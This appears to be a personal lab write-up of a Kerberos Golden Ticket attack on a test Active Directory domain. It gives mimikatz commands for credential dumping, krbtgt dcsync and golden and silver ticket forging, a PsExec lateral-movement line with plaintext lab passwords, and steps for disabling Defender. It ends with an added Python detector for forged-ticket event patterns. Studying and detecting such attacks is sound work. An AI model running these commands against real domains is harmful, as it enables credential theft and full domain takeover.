Golden Ticket
===

## Download

- [Windows Server 2016](https://mega.nz/#!8ER1lLgb!9EvVXNKHeRUUbkxdEfrwpzqgZbyv0zOsv-uqqRaL2zM)
- [mimikatz_trunk2.2.1.zip](https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip)
- [PSTools.zip](https://docs.microsoft.com/en-us/sysinternals/downloads/pstools)

## Setup Document

1. Turn off Windows Defender on the server side
2. Install the DNS and DHCP services on the server side
3. DNS -> add a new forest `mnd.com` -> 1231qaz@WSX -> ...
4. On the client side -> Identification... -> (https://portal2.ntua.edu.tw/cc/web_doc/form/4_equipment/win10.pdf)
5. `net view` errors ->
    - Error 6118, fix:
      :::warning
      On the server side, right-click "My Computer", open "Manage" > "Services" and start the "Computer Browser" service. If it will not start, confirm that the "Server" and "Workstation" services are running, then set the startup type of the "Computer Browser" service to "Manual".
      :::
    - Error 1231, fix:
      :::warning
      On the client side
      ![](https://i.imgur.com/tlFuQIQ.png)
      :::
6. Turn off Defender on the client side
7. Download [mimikatz](https://github.com/gentilkiwi/mimikatz) on the client side
8. `sekurlsa::logonpasswords` error ->
    - [ERROR kuhl_m_sekurlsa_acquireLSA ; Key import](https://www.jianshu.com/p/a8fbd557b627), fix:
      :::warning
      Download mimikatz 2.1.1 for Win 10 1809-1803: [mimikatz_trunk.zip](https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip)
      :::
9. Run

```shell=
.\mimikatz log "lsadump::dcsync /domain:mnd.com /user:krbtgt"
.\mimikatz "kerberos::golden /domain:mnd.com /sid:S-1-5-21-762870798-4199311121-3917955505 /aes256:7af9c54790ea2fad620e5a526babf8672b3df678397a76c22ded1981306df634 /user:krbtgt /ticket:gold"
#ctrl+c
dir \\WIN-1KA8HNASEGB.mnd.com\c$
psexec.exe...
```

## Hack process

1. ~~Compromise the Win10 host by any means~~
2. ~~Escalate privileges through a vulnerability~~
3. Use the Win10 local account to run `cmd.exe` with administrator rights
4. Run `C:\Users\sean\Desktop\mimikatz_trunk\x64\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"`, which yields one AD account, `MND\andy 1qaz@WSX`, and the local account `.\sean sean`, together with the password hashes of both accounts
5. Log in with the obtained AD account (andy) and open `cmd.exe` with the local account that has administrative rights (sean)
6. In `cmd.exe`, run:

```shell=
cd C:\Users\andy\Desktop\mimikatz_trunk\x64
```

```shell=
.\PsExec.exe -u MND\sean -p 1qaz@WSX3edc \\WIN-1KA8HNASEGB -i -d "cmd.exe" "/c ipconfig> C:\Users\sean\Desktop\ip.txt"
```

## Story

After logging in to Win10, a copy of mimikatz and a silver ticket left by the attacker were found on the desktop. The ticket contained krbtgt information, which was then used with mimikatz to generate a golden ticket, and finally the ticket was used to log in to AD.

## References

- https://wooyun.js.org/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.html
- https://blog.csdn.net/Captain_RB/article/details/107883264
- Generating a silver ticket (ldap)

```
.\mimikatz.exe log "kerberos::golden /domain:mnd.com /sid:S-1-5-21-762870798-4199311121-3917955505 /target:WIN-1KA8HNASEGB.mnd.com /service:ldap /rc4:c24beca7814e0941d2176c7968493558 /user:silver /ticket:silver_ldap"
```
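A defender-side check that pairs with the process above: the tickets on this page are forged for `krbtgt` and for a non-existent `silver` account, and a forged TGT is never issued by the KDC, so a service-ticket request (event 4769) with no preceding TGT request (4768) from the same host, a request for an account the directory does not contain, or an RC4 ticket in an AES domain are the signals this added example looks for. The event records, the account list and the 10-hour TGT lifetime are constructed assumptions; this is example code, not code from the page.

```python
"""Flag Kerberos ticket requests that look like forged (golden/silver) tickets.

The events below are constructed for this example; field names loosely follow the
Windows Security log for event IDs 4768 (TGT request) and 4769 (TGS request).
"""
from datetime import datetime, timedelta

# Constructed sample events: 4768 = TGT issued by the KDC, 4769 = service ticket request.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-01-01T09:00:00", "user": "andy", "ip": "10.0.0.21", "etype": "0x12"},
    {"id": 4769, "time": "2024-01-01T09:00:05", "user": "andy", "ip": "10.0.0.21", "etype": "0x12", "service": "WIN-1KA8HNASEGB$"},
    # No 4768 precedes this 4769 from this host: the TGT was never issued by the KDC.
    {"id": 4769, "time": "2024-01-01T09:30:00", "user": "krbtgt", "ip": "10.0.0.21", "etype": "0x12", "service": "WIN-1KA8HNASEGB$"},
    # Account does not exist in the directory and the ticket is RC4 in an AES domain.
    {"id": 4769, "time": "2024-01-01T09:31:00", "user": "silver", "ip": "10.0.0.21", "etype": "0x17", "service": "ldap"},
]
KNOWN_ACCOUNTS = {"andy", "sean", "krbtgt"}  # constructed list of accounts that exist in AD
TGT_LIFETIME = timedelta(hours=10)           # assumed default AD TGT lifetime
RC4_ETYPE = "0x17"


def detect_forged_tickets(events, known_accounts=KNOWN_ACCOUNTS):
    """Return (user, reason) findings for 4769 events that show forged-ticket signals."""
    findings = []
    known = {a.lower() for a in known_accounts}
    last_tgt = {}  # most recent KDC-issued TGT per (user, source ip)
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        key = (ev["user"].lower(), ev["ip"])
        if ev["id"] == 4768:
            last_tgt[key] = ts
            continue
        if ev["id"] != 4769:
            continue
        if ev["user"].lower() not in known:
            findings.append((ev["user"], "service ticket for an account not in the directory"))
        issued = last_tgt.get(key)
        if issued is None or ts - issued > TGT_LIFETIME:
            findings.append((ev["user"], "TGS request with no KDC-issued TGT (4768) within lifetime"))
        if ev["etype"] == RC4_ETYPE:
            findings.append((ev["user"], "RC4 ticket in an AES domain (encryption downgrade)"))
    return findings


if __name__ == "__main__":
    for user, reason in detect_forged_tickets(SAMPLE_EVENTS):
        print(f"{user}: {reason}")
```

The same lookup keyed on the account name instead of (user, ip) gives a coarser but quieter rule for environments where clients roam between addresses.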